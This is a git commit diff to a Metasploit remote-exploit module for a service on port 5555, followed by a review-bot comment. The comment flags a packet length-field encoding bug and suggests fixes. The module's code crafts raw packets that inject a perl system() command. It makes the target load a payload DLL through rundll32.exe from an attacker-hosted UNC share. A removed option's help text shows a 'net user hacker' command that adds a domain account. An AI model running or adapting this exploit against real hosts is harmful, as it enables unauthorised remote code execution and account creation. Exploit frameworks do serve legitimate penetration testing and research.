
Delete CMD option

This commit is contained in:
jvazquez-r7 2015-03-04 11:51:58 -06:00
parent d4337ce1ae
commit e04ff3ee24


@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(5555),
OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
], self.class)
@ -92,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exec_bar(cmd)
connect
cmd = cmd.gsub("\\", "\\\\\\\\")
vprint_status("Sending Command: #{cmd}")
cmd.gsub!("\\", "\\\\\\\\")
cmd_no = target['Offset'] + cmd.length
vprint_status("Size is #{cmd_no}")
pkt = "\x00\x00\x00"
pkt << cmd_no
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
@ -104,40 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
pkt << "('#{cmd}')" # Executable
pkt << "\x00"
sock.put(pkt)
# In my testing the default timeout (10) isn't enough
if datastore['CMD']
begin
res = sock.get_once(-1, 20)
rescue EOFError # happens when using the Powershell method
disconnect
return
end
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
disconnect
else
handler
disconnect
end
end
def exec_bar?(data)
return false if data.blank?
data_unpacked = data.unpack("NnVv")
data_unpacked.length == 4 && data_unpacked[0] == 16 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x39 && data_unpacked[3] == 0x20
connect
sock.put(pkt)
disconnect
end
def primer
if datastore['CMD']
print_status("Executing command #{datastore['CMD']}")
exec_bar(datastore['CMD'])
else
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{unc}")
sploit = "rundll32.exe #{unc},"
sploit << rand_text_numeric(1)
exec_bar(sploit)
end
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
print_status("#{peer} - Trying to execute remote DLL...")
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
exec_bar(sploit)
end
end
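Review bot: `pkt << cmd_no` (hunk 2, unchanged context in exec_bar) appends the Integer `cmd_no` as a codepoint rather than as a byte, so once `target['Offset'] + cmd.length` exceeds 127 the packet gains a multi-byte UTF-8 sequence — or raises RangeError if `pkt` is binary-encoded somewhere not visible here — and the length field is corrupted rather than rejected. After this commit the length is driven entirely by the `unc` path interpolated into `sploit` in `primer`, so a long host or share name now hits this path; I would write `fail_with(Failure::Unknown, "#{peer} - Command too long for the length field") if cmd_no > 255` before the append and replace the append with `pkt << [cmd_no].pack('C')`. Separately, the rewritten tail of exec_bar (connect / sock.put / disconnect) never reads a reply, so the validation the deleted `exec_bar?` performed is gone silently; a one-line comment such as `# Fire-and-forget: the service's reply is not checked` above `sock.put(pkt)` would save the next reader from looking for it. exec_bar's body begins in hunk 2 and continues into hunk 3.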